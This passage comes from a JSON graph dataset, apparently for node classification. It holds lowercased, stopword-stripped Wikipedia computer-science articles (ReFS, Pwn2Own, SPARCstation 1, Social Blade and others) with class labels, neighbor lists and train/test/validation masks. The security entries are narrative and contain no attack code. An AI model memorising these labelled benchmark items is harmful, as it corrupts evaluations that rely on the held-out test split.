allot service gateway traffic awareness feature suggest content based browsing activity may 2015 vodafone germany announced deployment allot websafe personal network-based security-as-a-service offering designed mobile users well small medium business clients includes anti-malware parental control options later year allot released allot service gateway-virtual edition allot sg-ve original service gateway introduced 2007 improve efficiency monetization options companies new framework integrates gateway framework virtual network remove physical hardware constraints february 2016 allot released allot service gateway 9500 expanding capabilities include enterprises data centers service providers june 2016 belgian cable company voo announced began using allot service gateway tera allot serviceprotector network traffic visibility analytics security along allot cmts manage congestion qos assurance 2017 allot released allot secure service gateway built allot service gateway utilizing real-time application-based traffic monitoring analytics deliver granular application level visibility ensure higher qoe users allot ssg combines application-based visibility control web security protects ddos attacks phishing threats",
    "neighbors": [
      704,
      9413,
      2409,
      10283,
      5276,
      9465,
      8668
    ],
    "mask": "None"
  },
  {
    "node_id": 9414,
    "label": 8,
    "text": "Social_Blade:social blade social blade sometimes spelled socialblade website tracks social media statistics analytics social blade notably tracks youtube platform also analytical information regarding twitch instagram twitter facebook mixer dailymotion social blade functions third-party respective social media platforms jason urgo ceo social blade jason urgo ceo social blade launched website february 2008 track statistics website digg 2010 website switched track youtube statistics october 2012 social blade became llc 2014 social blade launched consulting channel management services october 24 2018 social blade started popular live stream show subscriber difference t-series pewdiepie online competition stream regularly 900 viewers led large increase subscriber count accompany attention april 2019 social blade pulled april fools joke allowed users change subscriber counts ranks ridiculously high numbers frequently asked questions faq page social blade wrote order best scale tracking meet needs millions use social blade pull data youtube public api means 're getting information see public youtube channel pages work examine data across multiple days aggregate display format useful social blade website contains subscriber predictions social blade also provides real-time subscriber count updates social blade also noted work content creators youtube multi-channel networks mcns help creators get partnered official youtube twitter account teamyoutube wrote please know third party apps socialblade accurately reflect subscriber activity social blade twitter account responded tweet commenting n't make data get youtube api rely accuracy social blade community manager danny fratella suggested youtube content creators may notice subscriber view count purges due higher accessibility data-tracking tools like social blade social blade data analytics cited mainstream news media outlets money nbc huffpost outlets focused internet culture well kotaku polygon tubefilter aside using subscriber follower statistics reported social blade media outlets also cite social blade regards content creator account estimated earnings huffpost wrote social blade estimates earnings youtube channel based money generated every thousand ad views estimates n't exact instead create minimum maximum amount channel could earning cases range huge social blade support services manager jenna arnold stated range huge cpms cost per thousand views vary much anywhere 0.25 4.00 average urgo also commented 0.25– 4.00 per 1,000 views range stating data points change time time exact science generally hold true channels social blade blog also noted continuously updated articles news interest content creators helping stay top evolving trends ways better use youtube social media services",
    "neighbors": [
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 9415,
    "label": 8,
    "text": "Web_Services_Semantics:web services semantics web services semantics wsdl-s proposed extension wsdl standard wsdl-s extends standard wsdl include semantic elements improve reusability web services facilitating composition services improving discovery enabling integration legacy software web services framework wsdl-s developed ibm university georgia",
    "neighbors": [
      3323,
      10020,
      7878,
      8070
    ],
    "mask": "Test"
  },
  {
    "node_id": 9416,
    "label": 9,
    "text": "Anaphoric_macro:anaphoric macro anaphoric macro type programming macro deliberately captures form supplied macro may referred anaphor expression referring another anaphoric macros first appeared paul graham lisp name reference linguistic anaphora—the use words substitute preceding words codice_1 macro ansi common lisp anaphoric binding codice_2 result test expression clause example sums value non-codice_3 elements codice_2 refers values elements equal codice_3 codice_2 bound output codice_7 true collecting numbers larger 3 one example anaphoric version if-then-else construct introduces anaphor codice_2 bound result test clause another example anaphoric version λ-function binds function anaphor codice_9 allowing recur",
    "neighbors": [
      3336,
      5537,
      2062,
      6718
    ],
    "mask": "None"
  },
  {
    "node_id": 9417,
    "label": 3,
    "text": "Gemfire:gemfire gemfire released japan royal blood ロイヤルブラッド roiyaru buraddo super royal blood スーパーロイヤルブラッド sūpā roiyaru buraddo super famicom version medieval war game msx nintendo entertainment system super nes fm towns mega drive/genesis ms-dos later windows developed koei object game unify fictional island force players use infantry cavalry archers well fantasy units magicians dragons gargoyles order capture castle needed control particular territory sequel royal blood ii released japan market japanese windows game takes place fictitious isle ishmeria upon time six wizards wielding unique brand magic used powers protect island maintain peace disrupted collectively challenged fire dragon summoned forth wizard intent plunging country darkness sea-dwelling dragon peace known pastha charged six wizards task fighting back succeeded sealing fire dragon away ruby top crown became six jewels around crown base crown called gemfire symbol utmost power authority gemfire fell hands current king ishmeria eselred sought abuse object power using embark tyrannical reign instilling fear within oppressed subjects ishmeria fell despair power flourished finally young daughter princess robyn could bear watch father grievous misdeeds longer—she seized gemfire pried six wizard gems loose causing shoot upward sky circle briefly overhead scattering different parts ishmeria furious eselred learned robyn actions locked away tower futile deed already done robyn taken crucial first step toward freeing people meanwhile six wizards take residence prominent family ishmeria two powerful clans blanches led prince erin supported zendor emerald wizard wielder lightning lyles led prince ander backed pluvius sapphire wizard caster meteors four clans flax coryll chrysalis molbrew also wizards scylla empyron chylla skulryk respectively gemfire disposal beginning breaking spell gemfire clans sets unseat eselred claim throne restore order peace ishmeria outset game player option selecting scenario family chosen scenario changes relative power territories families although minor families present one two scenarios every family playable least one scenario except blanche lyle playable four lankshire played ultimately player must conquer entire map win game gameplay divided main world map screen individual battle screens map screen player allowed one action per turn in-game month per territory action player may hire move troops upgrade territory economy defenses engage diplomatic actions sabotage plunder neighboring territory attack adjacent enemy territory adjacent territories may attacked upon attacking attacked enemy focus shifts battle wherein player may field five units archers knights horsemen either wizard hired unit player moves individual companies troops map turn-based tactics fashion certain units may build fences keep enemies one army wins enemy base captured enemy units defeated enemy army runs food",
    "neighbors": [
      11477,
      9166,
      6797,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9418,
    "label": 2,
    "text": "Preview_(macOS):preview macos preview image viewer pdf viewer macos operating system enables users view print digital images portable document format pdf files preview uses apple implementation pdf specification aqua graphical user interface quartz graphics layer imageio core image frameworks like macos originated nextstep operating system company next part every release nextstep os since 1989 preview open following file types version preview included os x 10.3 could loop animated gifs via optional play button could added toolbar os x 10.4 preview lost playback functionality animated gifs would instead display individual frames numbered sequence preview encrypt pdf documents restrict use example possible save encrypted pdf password required copy data document print however encrypted pdfs edited original author always keep unencrypted version features otherwise available professional pdf editing software provided preview possible extract single pages multi-page documents e.g pdf files sort pages drag drop single multiple pages several opened multi-page documents applications attaching opened email message preview offers basic image correction tools using core image processing technology implemented macos features like shape extraction color extraction cropping rotation tools annotating images preview uses vector shapes text image rasterized jpeg png another bitmap format pdf image documents also supplied keywords automatically indexed using macos system-wide spotlight search engine preview directly access image scanners supported macos import images scanner preview convert image formats export bmp jp2 jpeg pdf pict png sgi tga tiff using macos print engine based cups also possible print postscript file pdf-x file directly save file iphoto example scanned photos beginning mac os x 10.7 lion preview restricts format option popup menu save dialog commonly used types possible access full format list holding option key clicking format popup menu gif icns jpeg jpeg-2000 microsoft bmp microsoft icon openexr pdf photoshop png sgi tga tiff new edit button picture edited introduced version 7 edit button allows options insert shapes lines cropping among things os x 10.9.2 preview support iso-standardized pdf iso 32000 saving destroys aspects pdf files without warning user",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      7806,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      3828,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      5895,
      1295,
      10512,
      4888,
      11037,
      1822,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      2886,
      9035,
      1878,
      4457,
      9100,
      9109,
      1439,
      8627,
      8628,
      7626,
      6093,
      7118,
      2513,
      3035,
      4571,
      3038,
      4068,
      5093,
      9700,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Train"
  },
  {
    "node_id": 9419,
    "label": 9,
    "text": "Presentation_semantics:presentation semantics computer science particularly human-computer interaction presentation semantics specify particular piece formal language represented distinguished manner accessible human senses usually human vision example saying codice_1 must render text constructs using bold typeface specification presentation semantics syntax example interactive presentation semantics defining expected behavior hypertext link suitable syntax many markup languages like html css dsssl xsl-fo troff presentation semantics others like xml xlink xpath character encoding standards like unicode also presentation semantics one main goals style sheet languages like css separate syntax used define structured data syntax endowed presentation semantics used render data various ways",
    "neighbors": [
      8923,
      11023,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 9420,
    "label": 6,
    "text": "ReFS:refs resilient file system refs codenamed protogon microsoft proprietary file system introduced windows server 2012 intent becoming next generation file system ntfs refs designed overcome problems become significant years since ntfs conceived related data storage requirements changed key design advantages refs include automatic integrity checking data scrubbing removal need running chkdsk protection data degradation built-in handling hard disk drive failure redundancy integration raid functionality switch copy/allocate write data metadata updates handling long paths filenames storage virtualization pooling including almost arbitrarily sized logical volumes unrelated physical sizes used drives requirements arose two major changes storage systems usage – size storage use large massive arrays multi-terabyte drives fairly common need continual reliability result file system needs self-repairing prevent disk checking impractically slow disruptive along abstraction virtualization physical disks logical volumes refs initially added windows server 2012 aim gradual migration consumer systems future versions achieved windows 8.1 initial versions removed ntfs features disk quotas alternate data streams extended attributes re-implemented later versions refs early versions 2012–2013 refs similar slightly faster ntfs tests far slower full integrity checking enabled result attributed relative newness refs pre-release concerns also voiced one blogger storage spaces storage system designed underpin refs reportedly could fail manner prevented refs recovering automatically ability create refs volumes removed windows 10 2017 fall creators update editions except enterprise pro workstations would seem indicate microsoft longer intending refs general replacement ntfs least near future cluster size refs volume either 4 kib 64 kib ntfs features implemented refs include object ids 8.3 filename ntfs compression encrypting file system efs transactional ntfs hard links extended attributes disk quotas addition windows booted refs volume dynamic disks mirrored striped volumes replaced mirrored striped storage pools provided storage spaces however automated error-correction supported mirrored spaces data deduplication missing early versions refs. implemented v3.2 debuting windows server v1709 support alternate data streams initially implemented refs windows 8.1 64-bit server 2012 r2 file system reacquired support alternate data streams lengths 128k automatic correction corruption integrity streams used parity spaces refs initially unsuitable microsoft sql server instance allocation due absence alternate data streams march 2015 review state refs windowsnetworking.com stated ’ least time boot windows refs volume first versions refs ’ include file-level compression encryption disk quotas hard links advantages ntfs fat file systems note refs support sparse files reparse points case-sensitive file names unicode file names perhaps important preserves enforces access control lists acls ’ obvious refs current iteration replacement ntfs ... applications rely specific ntfs features might work refs ... however ... storage conventional data ’ require specific ntfs features ’ supported refs refs handle duty nicely primary use case file servers store extremely large amounts data data integrity recovery mechanisms built file system well means tools designed detect repair file corruption file systems ’ necessary incompatibility refs ’ really issue additionally although refs ’ support file level encrypting file system encryption bitlocker used protect refs volumes ’ much issue either ... refs distinct advantages current reigning windows file system ntfs also drawbacks boasts self-healing powers ability repair files without time less risk data lost ’ power failure due way writes metadata course ability create huge volumes files even give files names longer 255 characters wish ’ quite ready prime time yet refs different versions various degrees compatibility operating system versions aside development versions filesystem usually later operating system versions mount filesystems created earlier os versions backwards compatibility features may compatible feature set os version cluster size features filesystem queried command fsutil fsinfo refsinfo volumename notes issues identified suggested refs running storage spaces intended design include storage developer conference 2015 microsoft developer presented enhancements refs expected released windows server 2016 included technical preview 4 titled refs v2 highlighted refs included capabilities high speed moving reordering cloning blocks files done blocks file particularly needed virtualization stated allow fast provisioning diff merging tiering enhancements cover redo log synchronous disk writes parallelization efficient tracking uninitialized sparse data files efficient 4k i/o refs file integrity enabled also acts like log-structured file system coalescing small random writes large sequential ones efficiency operating systems competing file systems refs best known zfs btrfs sense three designed integrate data protection snapshots silent high speed background healing corruption data errors 2012 phoronix wrote analysis refs vs btrfs copy-on-write file system linux features similar supporting checksums raid-like use multiple disks error detection/correction however refs lacks copy-on-write snapshots compression found btrfs zfs 2014 review refs assessment readiness production use concluded refs least advantages two main file system competitors",
    "neighbors": [
      5120,
      2564,
      11270,
      5643,
      6669,
      3598,
      4624,
      10257,
      9236,
      6677,
      5142,
      8214,
      537,
      3611,
      540,
      3102,
      9249,
      9762,
      8227,
      8740,
      5158,
      1577,
      10281,
      2101,
      7225,
      11323,
      10812,
      3648,
      10306,
      8772,
      582,
      9286,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      1109,
      10839,
      603,
      9819,
      3170,
      4708,
      9836,
      7789,
      622,
      9839,
      6768,
      9840,
      4210,
      7796,
      9333,
      6263,
      1656,
      6265,
      7290,
      1659,
      4731,
      9335,
      9343,
      10879,
      8841,
      7818,
      6797,
      654,
      2193,
      2194,
      9874,
      10900,
      2197,
      2199,
      4248,
      11419,
      7838,
      9377,
      3235,
      4771,
      6309,
      1190,
      1703,
      5286,
      6820,
      10405,
      2221,
      5293,
      7344,
      5300,
      2230,
      7351,
      5816,
      1212,
      2749,
      8380,
      10428,
      3265,
      2244,
      8391,
      200,
      10951,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      2782,
      9442,
      739,
      4836,
      6372,
      4326,
      2279,
      7907,
      1770,
      8938,
      3308,
      1263,
      3312,
      10993,
      3826,
      2291,
      246,
      3834,
      1791,
      3328,
      8959,
      11519,
      6403,
      11012,
      2314,
      8461,
      3856,
      6416,
      1810,
      3859,
      11030,
      3351,
      6935,
      8473,
      8985,
      11033,
      8988,
      11546,
      287,
      1825,
      6434,
      5413,
      3368,
      3881,
      5928,
      4907,
      9004,
      10024,
      302,
      7983,
      10026,
      6961,
      10029,
      6963,
      1844,
      9525,
      11572,
      823,
      10039,
      6970,
      6972,
      11072,
      3394,
      3909,
      2378,
      4431,
      5969,
      3922,
      4439,
      5465,
      346,
      2395,
      2397,
      2402,
      10596,
      2407,
      2919,
      10087,
      4458,
      6506,
      9066,
      11638,
      6519,
      376,
      9593,
      890,
      11128,
      2943,
      2944,
      7554,
      1418,
      5003,
      5004,
      7565,
      8075,
      8080,
      6545,
      5013,
      4505,
      11675,
      11676,
      11677,
      414,
      2974,
      7070,
      929,
      11683,
      10151,
      4012,
      430,
      1454,
      6062,
      10673,
      8114,
      7603,
      8631,
      1464,
      6584,
      1978,
      9655,
      10173,
      960,
      8129,
      7106,
      8643,
      8132,
      6088,
      969,
      3535,
      8659,
      7126,
      1498,
      5594,
      478,
      2015,
      6114,
      6115,
      1509,
      9189,
      6637,
      9709,
      7663,
      6641,
      3573,
      11256,
      2555,
      3582
    ],
    "mask": "Train"
  },
  {
    "node_id": 9421,
    "label": 4,
    "text": "ChronoSync:chronosync chronosync macos application periodic backups bootable drive clones folder synchronizations offers ability target device folder visible finder volume thumb drive nas disk image server another mac 2014 chronosync received top software pick about.com received 10 10 rating apple daily report",
    "neighbors": [
      1358
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9422,
    "label": 3,
    "text": "SPARCstation_1:sparcstation 1 sparcstation 1 sun 4/60 first sparcstation series sparc-based computer workstations sold sun microsystems distinctive slim enclosure square 3 inch high pizza box first sold april 1989 sun support ending 1995 based lsi logic risc cpu running 20 mhz weitek 3170 3172 fpu coprocessor fourth sun computer 4/260 4/110 4/280 use sparc architecture first sun4c architecture motherboard offered three sbus slots built-in aui ethernet 8 khz audio 5 mb/s scsi-1 bus basic display ran 1152×900 256 colours monitors shipped computer 16 19 inch greyscale colour designed ease production compete high-end pcs macs principal competitors macintosh ii ibm ps/2 model 80 next computer sun 3/80 sold us 9,000 hard disks us 20,000 — first year around 35,000 units sold sparcstation 1 features several distinctive design packaging elements driven internally system designer andy bechtolsheim externally design house frogdesign bechtolsheim specified motherboard would size sheet paper sbus expansion cards would size index cards resulting extremely compact footprint external design motif includes dot-patterned cooling vents side echoed dimple pattern front face sun purple feet sparcstation 1 takes 30 pin simms groups four take either 1 mb 4 mb simms long size consistent within bank total four memory banks give total 64 mb memory memory bank nearest floppy disk drive filled first openboot firmware hang memory checking sparcstation 1 space two hard drives one floppy drive internally machine take 50 pin scsi-2 hard drive openboot firmware boot partition starts ends 1024 mb floppy drive like macintosh unusual electromechanical eject mechanism rather conventional eject button therefore must ejected operating system openboot machine connect scsi cd drive via either scsi connector back connecting spare internal scsi connector via 50 pin cable sparcstation 1 comes on-board amd lance ethernet chipset 15-pin aui connector connect 10base2 10base5 10baset via appropriate transceiver openboot rom able boot network using rarp tftp like sparcstation systems sparcstation 1 holds system information mac address serial number nvram battery chip dies system able boot sparcstation 1 uses m48t02 battery-backed rtc ram chip handles real time clock boot parameter storage problem chip battery internal means entire chip must replaced battery runs sparcstation 1s made older battery life chip substantial number systems refuse boot additionally sparcstation 1 design used reserved bits m48t02 nvram non-standard way since later revisions m48t02 chip exert stricter control bits current m48t02 store nvram data rtc function correctly system may fail auto-boot due incompatibilities modern m48t02s common modify failed nvrams cutting encapsulation patching new battery also possible replace entire encapsulation also contains 32.768 khz clock crystal sparcstation 1 1+ ipc slc run following operating systems sparcstation 1+ sun 4/65 pushed cpu 25 mhz lsi l64801 upgraded coprocessor weitek 3172 installed new scsi controller sparcstation ipc sun 4/40 version sparcstation 1+ lunchbox style case onboard video sparcstation slc sun 4/20 version sparcstation 1+ built monitor cabinet sparcstation 2 sun 4/75 machine successor released 1990",
    "neighbors": [
      7104,
      9665,
      9955,
      10436,
      4581,
      4741,
      10982,
      823,
      2895,
      1776,
      6129,
      6415,
      1461,
      6006,
      1399,
      5498
    ],
    "mask": "None"
  },
  {
    "node_id": 9423,
    "label": 4,
    "text": "Check_Point_Integrity:check point integrity check point integrity endpoint security software product developed check point software technologies designed protect personal computers networks connect computer worms trojan horses spyware intrusion attempts hackers software aims stop new pc threats attacks signature updates installed pc software includes administrator manages security policies apply groups users central console server check point acquired integrity software part acquisition endpoint security start-up zone labs 2004 integrity software released early 2002 derived zonealarm security technology added central policy management network access control functions integrity integrated network gateways cisco vpn 3000 series ensure pc met security requirements granted access network demand endpoint security grew 2003 sql slammer blaster computer worms reportedly caused extensive damage despite widespread use antivirus software personal computers number destructive worms followed subsequent rise spyware significant problem continued increase demand endpoint security products data privacy integrity regulations required security audits mandated governmental professional authorities along infections damage caused guest pc access also prompted use security software competitors include symantec/sygate cisco security agent mcafee entercept even point products like determina memory firewall",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      10756,
      6797,
      1172,
      9496,
      10392,
      3482,
      1436,
      2041,
      4511,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      10872,
      2737,
      6834,
      8753,
      823,
      569,
      5178,
      11577,
      9279,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      10574,
      7121,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      4956,
      6364,
      8668,
      5860,
      3942,
      10987,
      8943,
      8816,
      9971,
      3704,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 9424,
    "label": 4,
    "text": "Pwn2Own:pwn2own pwn2own computer hacking contest held annually cansecwest security conference beginning 2007 contestants challenged exploit widely used software mobile devices previously unknown vulnerabilities winners contest receive device exploited cash prize masters jacket celebrating year win name pwn2own derived fact contestants must pwn hack device order win pwn2own contest serves demonstrate vulnerability devices software widespread use also providing checkpoint progress made security since previous year first contest conceived developed dragos ruiu response frustration apple lack response month apple bugs month kernel bugs well apple television commercials trivialized security built competing windows operating system time widespread belief despite public displays vulnerabilities apple products os x significantly secure competitors march 20 roughly three weeks cansecwest year ruiu announced pwn2own contest security researchers dailydave mailing list contest include two macbook pros would leave conference floor hooked wireless access point conference attendee could connect wireless access point exploit one devices would able leave conference laptop monetary reward ruiu outlined would progressively loosened restrictions hacks acceptable three days conference first day conference ruiu asked terri forslof zero day initiative zdi participate contest zdi programme purchases zero-day attacks reports affected vendor turns signatures network intrusion detection system increasing effectiveness vulnerabilities sold zdi made public affected vendor issued patch forslof agreed zdi offer purchase vulnerabilities used contest flat price 10,000 first contest intended highlight insecurity apple mac os x operating system since time widespread belief os x far secure competitors contest took place thursday april 18 saturday april 20 2007 two macbook pro laptops one 13 one 15 left conference floor cansecwest joined separate wireless network certain attacks allowed restrictions progressively loosened three days conference order win 15 macbook pro contestants would required escalate privileges root gaining access initial exploit 10,000 prize announced zdi laptops hacked first day shane macaulay called former co-worker dino dai zovi new york urged compete second day starting thursday night dai zovi found exploited previously unknown vulnerability quicktime library loaded safari 3am night following morning dai zovi packaged exploit code sent macaulay conference vancouver macaulay placed dai zovi exploit code website e-mailed contest organizers link clicked contest laptop dai zovi exploit code allowed shane take control laptop winning contest proxy dai zovi thank helping win contest dai zovi let macaulay keep 15 macbook pro dai zovi separately sold vulnerability zdi 10,000 prize successful 2007 contest scope pwn2own contest expanded include wider array operating systems browsers contest would demonstrate widespread insecurity software widespread use consumers dragos refined contest help wide panel industry experts contest administered zdi would offer purchase vulnerabilities demonstration vulnerabilities zdi purchases details vulnerabilities used pwn2own would provided affected vendors public details would withheld patch made available contestants successfully demonstrated exploits contest could sell vulnerabilities zdi prizes 20,000 first day 10,000 second day 5,000 third day pwn2own 2008 took place thursday march 26 saturday march 28 2008 2008 contest three different target laptops running default installation either windows vista ultimate sp1 os x 10.5.2 ubuntu linux 7.10 previous year contest pwn2own took place course three days certain attacks allowed day laptop running os x exploited second day contest exploit safari browser co-written charlie miller jake honoroff mark daniel independent security evaluators exploit targeted open-source subcomponent safari browser laptop running windows vista sp1 exploited third day contest exploit adobe flash co-written shane macaulay alexander sotirov derek callaway contest adobe disclosed co-discovered vulnerability internally working patch time pwn2own laptop running ubuntu exploited considerably success targeting web browsers category software third pwn2own focused popular browsers used consumer desktop operating systems added another category mobile devices contestants challenged hack via many remote attack vectors including email sms messages website browsing pwn2own 2009 took place three days cansecwest thursday march 18 saturday march 20 2009 contestants demonstrated successful exploits contest offered rewards underlying vulnerabilities zdi 5,000 browser exploits 10,000 mobile exploits browser targets internet explorer 8 firefox chrome installed sony vaio running windows 7 beta safari firefox installed macbook running mac os x browsers fully patched default configurations first day contest previous years attack surface contest expanded three days multiple winners per target allowed first contestant exploit laptop would get mobile device targets included blackberry android iphone symbian windows mobile phones default configurations specific devices included browser contest attack surface available contestants expanded three days order prove able successfully compromise device contestants demonstrate could collect sensitive data mobile device incur type financial loss mobile device owner multiple winners per device allowed first contestant exploit mobile device would get along one-year phone contract based increased interest competing year zdi arranged random selection determine team went first target first contestant selected charlie miller exploited safari os x without aid browser plugins interviews winning contest miller stressed took minutes run exploit safari took many days research develop exploit used researcher identified nils selected go miller nils successfully ran exploit internet explorer 8 windows 7 beta writing exploit nils bypass anti-exploitation mitigations microsoft implemented internet explorer 8 windows 7 including data execution protection dep address space layout randomization aslr nils continued trying browsers although miller already exploited safari os x nils exploited platform moved exploit firefox successfully near end first day julien tinnes sami koivu remote successfully exploited firefox safari os x vulnerability java time os x java enabled default allowed reliable exploitation platform however due reported vulnerabilities vendor already tinnes participation fell outside rules contest unable rewarded next days contest attract additional contestants chrome well mobile devices went unexploited pwn2own 2009 competition started march 24 2010 total cash prize pool us 100,000 march 15—nine days contest begin—apple released sixteen patches webkit safari 40,000 100,000 reserved web browsers target worth 10,000 60,000 total 100,000 cash prize pool allotted mobile phone portion contest target worth 15,000 opera web browser left contests target zdi team argued opera low market share chrome safari included due default presence various mobile platforms however opera rendering engine presto present millions mobile platforms 2011 contest took place march 9 11th cansecwest conference vancouver canada web browser targets 2011 contest included microsoft internet explorer apple safari mozilla firefox google chrome new pwn2own contest fact new attack surface allowed penetrating mobile phones specifically cellphone basebands mobile phone targets dell venue pro running windows phone 7 iphone 4 running ios blackberry torch 9800 running blackberry os 6.0 nexus running android 2.3 following teams registered desktop browser contest mobile browser category following teams registered first day competition safari internet explorer defeated researchers safari version 5.0.3 installed fully patched mac os x 10.6.6 french security firm vupen first attack browser five seconds browser visited specially crafted malicious web page launched standard harmless payload demonstrate arbitrary code executed written file hard disk demonstrate sandbox bypassed internet explorer 32-bit version 8 installed 64-bit windows 7 service pack 1 security researcher stephen fewer harmony security successful exploiting ie demonstrated safari day 2 iphone 4 blackberry touch 9800 exploited iphone running ios 4.2.1 however flaw exists version 4.3 ios security researchers charlie miller dion blazakis able gain access iphone address book vulnerability mobile safari visiting exploit ridden webpage blackberry torch 9800 phone running blackberry os 6.0.0.246 team vincenzo iozzo willem pinckaers ralf philipp weinmann took advantage vulnerability blackberry webkit based web browser visiting previously prepared webpage firefox android windows phone 7 scheduled tested day 2 security researchers chosen platforms attempt exploits sam thomas selected test firefox withdrew stating exploit stable researchers chosen test android windows phone 7 show teams showed day three chrome firefox hacked 2012 rules changed capture-the-flag style competition point system new format caused charlie miller successful event past years decide attend pwn2own chrome successfully exploited first time vupen declined reveal escaped sandbox saying would sell information internet explorer 9 windows 7 successfully exploited next firefox third browser hacked using zero day exploit safari mac os x lion browser left standing conclusion zero day portion pwn2own versions safari fully patched running mac os x snow leopard compromised cve portion pwn2own noted significant improvements security mitigations within mac os x introduced lion google withdrew sponsorship event 2012 rules require full disclosure exploits winners specifically exploits break sandboxed environment demonstrated exploits win pwn2own defended decision saying believed hackers would attempt exploit chrome methods disclosed google offered separate pwnium contest offered 60,000 chrome-specific exploits non-chrome vulnerabilities used guaranteed immediately reported appropriate vendor sergey glazunov teenager identified pinkiepie earned 60,000 exploits bypassed security sandbox google issued fix chrome users less 24 hours pwnium exploits demonstrated google returned sponsor rules changed require full disclosure exploits techniques used web browsers google chrome internet explorer firefox along windows 8 java exploited french security firm vupen successfully exploited fully updated internet explorer 10 microsoft surface pro running 64-bit version windows 8 fully bypassed protected mode sandbox without crashing freezing browser vupen team exploited mozilla firefox adobe flash oracle java nils jon mwrlabs successful exploiting google chrome using webkit windows kernel flaws bypass chrome sandbox 100,000 george hotz exploited adobe acrobat reader escaped sandbox win 70,000 james forshaw joshua drake ben murphy independently exploited oracle java win 20,000 apple safari mountain lion targeted teams showed mobile pwn2own 2013 contest held november 13–14 2013 pacsec 2013 conference tokyo japan pinkie pie 50,000 google released chrome updates 14 nov address vulnerabilities exploited pwn2own 2014 vupen successfully exploited fully updated internet explorer 11 adobe reader xi google chrome adobe flash mozilla firefox 64-bit version windows 8.1 win total 400,000—the highest payout single competitor date company used total 11 distinct zero-day vulnerabilities nico joly vupen team—was sole competitor take windows phone lumia 1520 year entering exploit aimed ie 11 mobile successfully able exfiltrate cookie database however sandbox held unable gain full control system apple safari mac os x mavericks adobe flash windows 8.1 successfully exploited liang chen keen team zeguang zhao team509 collected 140,000 prize money internet explorer 11 windows 8.1 successfully exploited sebastian apelt andreas schmidt prize 100,000 mozilla firefox exploited jüri aedla mariusz młyński george hotz independently winning 50,000 anonymous participant exploited google chrome however upon review contest judges declared partial win due one portion presentation ’ collision vulnerability exploited earlier week pwnium competition 2015 every single prize available claimed 2016 chrome microsoft edge safari hacked according brian gorenc manager vulnerability research hpe chosen include firefox year wanted focus browsers made serious security improvements last year 2017 chrome successful hacks although one team attempted target chrome subsequent browsers best fared order firefox safari edge 2018 conference much smaller sponsored primarily microsoft shortly conference microsoft patched several vulnerabilities edge causing many teams withdraw nevertheless certain openings found edge safari firefox hack attempts made chrome although reward offered edge many microsoft products large rewards available anyone able gain access edge successfully exploited",
    "neighbors": [
      1664,
      6528,
      6657,
      3971,
      9732,
      3205,
      3462,
      7943,
      8584,
      11655,
      3473,
      2579,
      7572,
      8212,
      7449,
      10393,
      7965,
      10910,
      8351,
      928,
      161,
      2208,
      5026,
      7713,
      11559,
      1834,
      9770,
      7340,
      5677,
      9518,
      559,
      9908,
      4661,
      6326,
      3639,
      5176,
      11449,
      4283,
      2492,
      700,
      4797,
      5054,
      64,
      10057,
      11466,
      5707,
      7885,
      4048,
      10834,
      4310,
      5078,
      6231,
      6747,
      4956,
      8923,
      6368,
      737,
      5605,
      1638,
      487,
      3944,
      4326,
      1642,
      8169,
      4972,
      8557,
      494,
      9834,
      1520,
      7152,
      115,
      9843,
      3573,
      4728,
      5114,
      8443
    ],
    "mask": "None"
  },
  {
    "node_id": 9425,
    "label": 9,
    "text": "Walter_Bright:walter bright walter bright american computer programmer created programming language zortech c++ compiler empire computer game bright main developer first c++ compiler translate source code directly object code without using c intermediate zortech c++ later becoming symantec c++ digital mars c++ designing c++ compiler developed datalight c compiler also sold zorland c later zortech c. bright graduated caltech 1979 bachelor science aerospace engineering university wrote empire wargame pdp-10 mainframe completed 1977 walter bright creator programming language implemented compilers several languages considered expert many areas related compiler technology walter regularly writes scientific magazine articles compilers programming blogger dr. dobb journal hired facebook write fast c/c++ preprocessor",
    "neighbors": [
      1952,
      9569,
      5165,
      3990,
      8057,
      8474,
      380,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9426,
    "label": 4,
    "text": "National_Strategy_to_Secure_Cyberspace:national strategy secure cyberspace united states government national strategy secure cyberspace component larger national strategy homeland security national strategy secure cyberspace drafted department homeland security reaction september 11 2001 terrorist attacks released february 14 2003 offers suggestions mandates business academic individual users cyberspace secure computer systems networks prepared year research businesses universities government five months public comment plan advises number security practices well promotion cyber security education national strategy secure cyberspace identifies three strategic objectives 1 prevent cyber attacks america critical infrastructures 2 reduce national vulnerability cyber attacks 3 minimize damage recovery time cyber attacks occur meet objectives national strategy outlines five national priorities first priority creation national cyberspace security response system focuses improving government response cyberspace security incidents reducing potential damage events second third fourth priorities development national cyberspace security threat vulnerability reduction program creation national cyberspace security awareness training program necessity securing governments cyberspace aim reduce threats vulnerabilities cyber attacks fifth priority establishment system national security international cyberspace security cooperation intends prevent cyber attacks could impact national security assets improve international management response attacks ultimately national strategy encourages companies regularly review technology security plans individuals use internet add firewalls anti-virus software systems calls single federal center help detect monitor analyze attacks expanded cyber security research improved government-industry cooperation",
    "neighbors": [
      5002,
      10859,
      5341
    ],
    "mask": "None"
  },
  {
    "node_id": 9427,
    "label": 3,
    "text": "Socket_FT1:socket ft1 socket ft1 bga413 cpu socket released january 2011 amd apus codenamed desna ontario zacate hondo uber name brazos available chipsets consult fusion controller hubs fch",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      9092,
      10375,
      3464,
